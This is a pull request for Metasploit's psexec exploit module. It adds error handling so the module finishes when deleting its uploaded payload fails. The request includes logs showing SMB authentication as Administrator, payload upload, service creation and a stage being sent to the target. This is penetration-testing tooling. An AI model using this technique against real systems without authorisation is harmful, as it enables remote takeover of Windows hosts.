### PR TITLE
Allow windows/smb/psexec to finish when file deletion fails 

### DIFF
--- a/modules/exploits/windows/smb/psexec.rb
+++ b/modules/exploits/windows/smb/psexec.rb
@@ -231,10 +231,18 @@ class Metasploit3 < Msf::Exploit::Remote
         #This is not really useful but will prevent double \\ on the wire :)
         if datastore['SHARE'] =~ /.[\\\/]/
           simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
-          simple.delete("\\#{fileprefix}\\#{filename}")
+          begin
+            simple.delete("\\#{fileprefix}\\#{filename}")
+          rescue XCEPT::ErrorCode => e
+            print_error("Delete of \\#{fileprefix}\\#{filename} failed: #{e.message}")
+          end
         else
           simple.connect("\\\\#{datastore['RHOST']}\\#{smbshare}")
-          simple.delete("\\#{filename}")
+          begin
+            simple.delete("\\#{filename}")
+          rescue XCEPT::ErrorCode => e
+            print_error("Delete of \\#{filename} failed: #{e.message}")
+          end
         end
       end
     end


### PR DESCRIPTION
Before this change, the psexec module was failing when the deletion step was erroring. Makes sense to give the module the chance to finish, even if deletion fails.

Failure example:

```
[+] [2015.10.26-17:53:52] Workspace:MetaModule Progress:1/4 (25%) Running Credential Exploitation Against Services: SMB
[+] [2015.10.26-17:53:52] Workspace:MetaModule Progress:2/4 (50%) Attempting to Open Shells on 1 hosts
[*] [2015.10.26-17:53:53] Choosing a random listener since we have no host information for this target
[*] [2015.10.26-17:53:54] Started bind handler
[*] [2015.10.26-17:53:54] Connecting to the server...
[*] [2015.10.26-17:53:54] Authenticating to 1.1.1.1:445|WORKGROUP as user 'Administrator'...
[*] [2015.10.26-17:53:54] Uploading payload...
[*] [2015.10.26-17:53:56] Created \UzwPiuYU.exe...
[*] [2015.10.26-17:53:57] 1.1.1.1:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:1.1.1.1[\svcctl] ...
[*] [2015.10.26-17:53:57] 1.1.1.1:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:1.1.1.1[\svcctl] ...
[*] [2015.10.26-17:53:57] 1.1.1.1:445 - Obtaining a service manager handle...
[*] [2015.10.26-17:53:57] 1.1.1.1:445 - Creating the service...
[+] [2015.10.26-17:53:57] 1.1.1.1:445 - Successfully created the service
[*] [2015.10.26-17:53:57] 1.1.1.1:445 - Starting the service...
[+] [2015.10.26-17:53:58] 1.1.1.1:445 - Service started successfully...
[*] [2015.10.26-17:53:58] 1.1.1.1:445 - Removing the service...
[+] [2015.10.26-17:53:58] 1.1.1.1:445 - Successfully removed the sevice
[*] [2015.10.26-17:53:58] 1.1.1.1:445 - Closing service handle...
[*] [2015.10.26-17:53:58] Deleting \UzwPiuYU.exe...
[-] [2015.10.26-17:53:59] Exploit failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_CANNOT_DELETE (Command=6 WordCount=0)

```
## Verification
- [ ] Verify which the module continues and is able to get a session even if deletion fails

```
[*] [2015.10.26-16:37:23] Started bind handler
[*] [2015.10.26-16:37:23] Connecting to the server...
[*] [2015.10.26-16:37:23] Authenticating to 1.1.1.1:445|WORKGROUP as user 'Administrator'...
[*] [2015.10.26-16:37:24] Uploading payload...
[*] [2015.10.26-16:37:26] Created \RimxbqZs.exe...
[*] [2015.10.26-16:37:26] 1.1.1.1:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:1.1.1.1[\svcctl] ...
[*] [2015.10.26-16:37:26] 1.1.1.1:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:1.1.1.1[\svcctl] ...
[*] [2015.10.26-16:37:26] 1.1.1.1:445 - Obtaining a service manager handle...
[*] [2015.10.26-16:37:26] 1.1.1.1:445 - Creating the service...
[+] [2015.10.26-16:37:27] 1.1.1.1:445 - Successfully created the service
[*] [2015.10.26-16:37:27] 1.1.1.1:445 - Starting the service...
[+] [2015.10.26-16:37:27] 1.1.1.1:445 - Service started successfully...
[*] [2015.10.26-16:37:27] 1.1.1.1:445 - Removing the service...
[+] [2015.10.26-16:37:27] 1.1.1.1:445 - Successfully removed the sevice
[*] [2015.10.26-16:37:27] 1.1.1.1:445 - Closing service handle...
[*] [2015.10.26-16:37:28] Deleting \RimxbqZs.exe...
[-] [2015.10.26-16:37:28] Delete of \RimxbqZs.exe failed: The server responded with error: STATUS_CANNOT_DELETE (Command=6 WordCount=0)
[*] [2015.10.26-16:37:29] Sending stage (885806 bytes) to 1.1.1.1
```
